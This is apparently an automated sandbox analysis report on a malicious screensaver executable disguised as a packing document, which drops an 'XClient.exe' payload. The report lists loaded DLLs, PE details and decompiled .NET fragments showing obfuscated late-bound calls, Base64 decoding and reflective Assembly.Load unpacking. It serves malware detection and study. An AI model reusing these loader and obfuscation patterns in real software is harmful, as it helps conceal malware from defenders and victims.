Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: XClient.lnk.3.dr

LNK file: ..\..\..\..\..\XClient.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: zOCS.pdbSHA256 source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr
Source:	Binary string: zOCS.pdb source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, XClient.exe.3.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.V5iefvrq5ojDNrXhTMMo4zwFWo7bRXWxOZCqoGeeUpQmix0ckylU4EMAyEK5rzrqFBO4vVj,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.GFSxJ5J90XVIk,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq._1CGKpY5HgwGOF,oH3flyRjabx0jxCH7tXQIiCnuqLbD7Xdr4hJAcFahu20RhEWqLnxgETXpnCwnsiyTa9kAvq.u4082n7RFaVyO,_3QiiXqkghrMk1.Ds6pGCLI6znqx()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{mJgaCaREgzuBt[2],_3QiiXqkghrMk1.BvKeDBBOxQxE8(Convert.FromBase64String(mJgaCaREgzuBt[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { mJgaCaREgzuBt[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe, formMain.cs	.Net Code: InitializeComponent
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.97a0000.6.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YDMP6WKRt6Ugl0371L.cs	.Net Code: d0nmhgjMcR31sbBGtEN System.Reflection.Assembly.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.43b0b90.3.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.8d20000.5.raw.unpack, YDMP6WKRt6Ugl0371L.cs	.Net Code: d0nmhgjMcR31sbBGtEN System.Reflection.Assembly.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4dc64e8.2.raw.unpack, YDMP6WKRt6Ugl0371L.cs	.Net Code: d0nmhgjMcR31sbBGtEN System.Reflection.Assembly.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: WtIrNy0hVmv60 System.AppDomain.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r System.AppDomain.Load(byte[])
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.35568c8.0.raw.unpack, 4QBfyOitSe4w0.cs	.Net Code: EcGTN38sUvr8r
Source: XClient.exe.3.dr, formMain.cs	.Net Code: InitializeComponent
Source: 3.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3a85570.1.raw.unpack, formMain.cs	.Net Code: InitializeComponent

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe

Static PE information: 0xC6141E0D [Tue Apr 23 01:06:21 2075 UTC]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_02D9629D push eax; ret	4_2_02D96351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_086C7800 push eax; retf	4_2_086C7801
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DB63B1 push eax; ret	7_2_04DB6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DB634D push eax; ret	7_2_04DB6361
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DB5DD0 push esp; ret	7_2_04DB5DE3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_04DB68D2 pushad ; ret	7_2_04DB6903
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_07C71743 pushad ; iretd	7_2_07C71759
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08DE7098 push esp; ret	7_2_08DE7099
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08DE7DF8 pushfd ; iretd	7_2_08DE7DF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_04626348 push eax; ret	9_2_04626351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_07494638 pushad ; iretd	9_2_07494991
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 12_2_04DC6348 push eax; ret	12_2_04DC6351

Source: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Static PE information: section name: .text entropy: 7.913792552903148
Source: XClient.exe.3.dr	Static PE information: section name: .text entropy: 7.913792552903148

Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, NAJ7s7Uw2SoH4wv6j5.cs	High entropy of concatenated method names: 'gS27VEVove', 'JwS7jMYPgT', 'jDG7o84df9', 'wkc7q0ZsKW', 'zJd7POilHS', 'NuV7NLvZB9', 's4j7KRsCt7', 'yWL74oLDB0', 'vmJ7biDfNm', 'Bqn7gDQ7TK'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, crjZejZ17fOgQiWqyV.cs	High entropy of concatenated method names: 'VWFL0fW1XD', 'sRZLXp543k', 'TpOLOwD0sn', 'TI7Lc99QeN', 'tlxLuYMgYo', 'LykLpuikWB', 'ewoLQyfx91', 'b0uLlOE7AK', 'gklLkNXUYR', 'aPFLmV5nCn'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, x8kmF9didSRhWBKy0in.cs	High entropy of concatenated method names: 'XbwBDHWwm5', 'aDsB1eo2lE', 'QUnBhguqOL', 'gl3BFhSMEp', 'GSHBIt7lQb', 'kFABYIMIi5', 'FHaBRM7mAJ', 'SdBB0CbfWf', 'pgYBXE1Bsg', 'RWvBacVuPA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, seF2nS8mYgQPw7gqtN.cs	High entropy of concatenated method names: 'e1mAU4BaGQ', 'SD8AEM9r3D', 'E6T7i4qRON', 'Y0h7dUbeUl', 'FWrAmWEu4P', 'ynvAMIKGju', 'IlxAZmMtRM', 'yWEArnG8By', 'ILGA51qmwg', 'njiAe2niBp'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, tk7eFSElmxiFYOIr62.cs	High entropy of concatenated method names: 'scFBdfsuiX', 'oeDB2H3lSB', 'Ku8BncCyIv', 'dMGBV7aDkJ', 'wXnBj2Y4k2', 'DZ8BqGk6fg', 'b2qBPRKCTb', 'sfO7Cy32tN', 'kOa7Uoi5m7', 'c5G7sUe10T'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, J5o4JL0ENemqPugCy1.cs	High entropy of concatenated method names: 'msKjr4frvg', 'Pelj5ZtP4w', 'yZ7je3Pwxt', 'GULj6RRBLB', 'lXyjfweZ8y', 'sWqj8XqU8F', 'bg4jClKOE0', 'ckKjUe0qpt', 'z7MjsJ9NwZ', 'iaZjEjHDpH'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, OZHkEFrQRFn3gmFIgR.cs	High entropy of concatenated method names: 'KpG3kvmDKj', 'EVA3MmvI50', 'HFN3rsgpBj', 'OW135XcPAK', 'ocK3c2NbNg', 'dqx3TW3t5B', 'Ibi3uK9gFT', 'zWO3ptKgf9', 'whR3SOiuaO', 'Tue3QsTmx0'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, GZPwOSd2anugPF73bJy.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NunyrM1CpR', 'qL3y53s5K5', 'HplyeO5QbU', 'oWCy6NZKFo', 'CLyyf25xPK', 'Cw6y8tC6i6', 'C2dyC9L0fX'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YUEbLZsZ2Sra2NBB7X.cs	High entropy of concatenated method names: 'hhD7OxtUgk', 'XJH7cFvssX', 'rAF7TnoBkT', 'ySR7u9ErDZ', 'iF97rUD9QN', 'p3X7pPOQ9K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, We4yQo6DX3r40vFw5r.cs	High entropy of concatenated method names: 'Gx1AbGKGGO', 'hxiAgq89v7', 'ToString', 'WOdAVMtXgw', 'QajAjfLFo3', 'SNMAopXLD2', 'LiIAq5HRTp', 'UJUAPCDy25', 'C3qANFl31E', 'bFBAKn60K6'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, YDMP6WKRt6Ugl0371L.cs	High entropy of concatenated method names: 'smG2GutHY2', 'gQu2VPHoud', 'JIN2j8I0dU', 'iuS2oZjXW0', 'pLl2q40HQg', 'w1Q2PCjmOG', 'mQF2NKeirm', 'Bsp2KIOtqm', 'lZa24GFF2P', 'oBx2bZ3tB5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, Stj9yieKsnnj4Xevau.cs	High entropy of concatenated method names: 'ToString', 'yb8tm4nfKu', 'ilmtcVtSav', 'QuytTdyEUF', 'iMbtuWq2jF', 'F6qtpj3spc', 'CuktSCvUQq', 'Bd8tQuTXbB', 'kmMtl53WLb', 'YrntxXOcc7'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, EwE7DknQVZq6Qfg03h.cs	High entropy of concatenated method names: 'URpdN5o4JL', 'YNedKmqPug', 'pjgdbREvar', 'JD9dgX5teU', 'uhod3IvtVh', 'I64dta2nfM', 'VgiqwdaCPstikvJdLy', 'XtdyYqshtcrGfAcOfy', 'kKPddGoZuu', 'h3kd2ZZouA'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, CTq67NxffZ5PSQfod1.cs	High entropy of concatenated method names: 'EA1NDQuiMJ', 'w91N1OLca7', 'DYgNhN21GC', 'vExNFU6ggj', 'qrBNI6VjKh', 'bP3NYYR7C6', 'Yu2NRbUYTN', 'sfEN0yUJ67', 'chLNX5bcPA', 'cpINaMHdDR'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, uk8LytXjgREvaruD9X.cs	High entropy of concatenated method names: 'ot1oFOd1dk', 'r5foYBYISF', 'fG3o0UhvSJ', 'JwpoX20dRm', 'F9ho3YpbIP', 'X1Ootp4pd5', 'nWLoARnrx4', 'U3po7jcPL2', 'N8voBfLQDX', 'Ai3oyj37Ca'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, v7HrGpjK5bgMXw9Ba0.cs	High entropy of concatenated method names: 'Dispose', 'jEsdsWhJDn', 'MU1wcm08Ha', 'vp366OJsPl', 'ukAdEJ7s7w', 'dSodzH4wv6', 'ProcessDialogKey', 'g5EwiUEbLZ', 'P2Swdra2NB', 'r7Xwwyk7eF'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, qEVWs0Qy0o6fd3t441.cs	High entropy of concatenated method names: 'JDlNVbTgUL', 'JQrNo8ggO7', 'O76NPjHSDm', 'DdLPE41XOb', 'bgaPzPNJ4j', 'yLgNirbJnj', 'cGANdXPemy', 'lpENwP2B5V', 'LQnN2qxUAk', 'fmZNnth6pL'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, fuNwWooAn7jcS70K43.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NtUwsXyOKk', 'Y26wECoaD4', 'cN9wzbXSys', 'EdB2iQoiOC', 'AZg2di3mUr', 'mZm2wTAjMo', 'wkg22Kp8VI', 'qICcRGjuxjIJW9ioId5'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, pVhu64Oa2nfMhPyY63.cs	High entropy of concatenated method names: 'xZBPGCuiyH', 'V26PjiI5KW', 'ADRPqroEpi', 'AaRPN4mp2V', 'N5YPKKBNYj', 'dUGqf25Ary', 'qTCq8mi8aX', 'XBBqC1SuiK', 'cDjqUJy57H', 'HEgqsY7hUy'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.4d762c8.4.raw.unpack, xj5QWywXFCIEkp4owF.cs	High entropy of concatenated method names: 'hGTh1JAIG', 'k09F825cC', 'SRLYu0v0s', 'yuSRC42ll', 'JDxX81x5B', 'SC1a9fLhJ', 'lZwBplAExbWvbe1RHW', 'QJUfpswkmOApkS1gR5', 'AJQ73Rm6T', 'bwCyoepNt'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, OEGyOZzp9CU9Z.cs	High entropy of concatenated method names: 'QYSru9RU5dJWd', 'oi9Msqd9lmqFp', 'Gh7hF3Ceyz4jK', 'x2Kcz0n4msm1l2xM', '_4hDI5T8H5DCOIm19', 'T6aFt50BZla82ZA2', 'zpcOiMJTAlF4Htxi', 'TMFXXcHHzUU18I1r', 'ZSkwZRotVkMfXhhu', 'Um2YTXt47I4LIxgc'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, v5gt0V01k1MSsC0vwoxxBSwsEW4T1eqJw046P2ak3r4M2UHQ1RfEfyXqwlgDqRqjrSOTYe7.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'QTea7y2A8yGbO3jMXxuYC9YMcx5anBR', 'ZTIL5yWBKqapf9Byr2X2ov4nJgGIqjf', 'WHkIaWdsBqOvjqgK5gnz3Hq7FGRo7av', 'ksvOYOxtyeEJgsYuEk2j6FJUFQEL7jb'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, xEwUvc4BlwXCJ.cs	High entropy of concatenated method names: 'upuCmD95kpAQn', 'y64QqzLLzgvYy', 'nHNLF6ETZc4pz', 'wFe23vyXZnI9p', 'oPyUSoKLxc3MJ', 'j0yacKOMxpzCw3ZgwzP7SYa9OQxk42U', 'sG0Gu7E9uPceY4JkCHFeLM6rppnIbSk', 'Ic69UCn21qS8jQPeUpzcxe67X8Wwo7C', 'TVdrYhGtHgnmKaKEGnnQHc1AVeCLwz9', 'h9lFeGqDok6PiuQlRtN7JIQA7sN9FeZ'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, qMGvLJvouSdkL.cs	High entropy of concatenated method names: 'wAkM01TBZTMeC', 'ciAT4tkkLZ8RM', 'kyv1OiOaRjUOS', 'Is1Vu2C8gzfuWAcZ', 'ZrXVwJq1NPBYst66', 'YSiZ9OqRAn5DEoap', 'kpqsU8I4EmsXem6T', 'Y40LWH71GiExNonP', 'wlqe8L0mqhORb3Xh', 'cBzGfHA7YZurGUjI'
Source: 0.2.PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe.3547fe4.1.raw.unpack, 3QiiXqkghrMk1.cs	High entropy of concatenated method names: '_7TDRTDNWODVx9', 'bjpklCnAU25Ps', '_7whWzOffgktu7', 'H6OjpWJSuZpR7', 'LgXlVehbtF6PL', 'VPnNUxfUUOfKi', 'kVcqKyJkqeEYF', 'I9f9xqzndWbJy', 'Yh4ih3UMSubwZ', '_99oZuJy83I8YX'
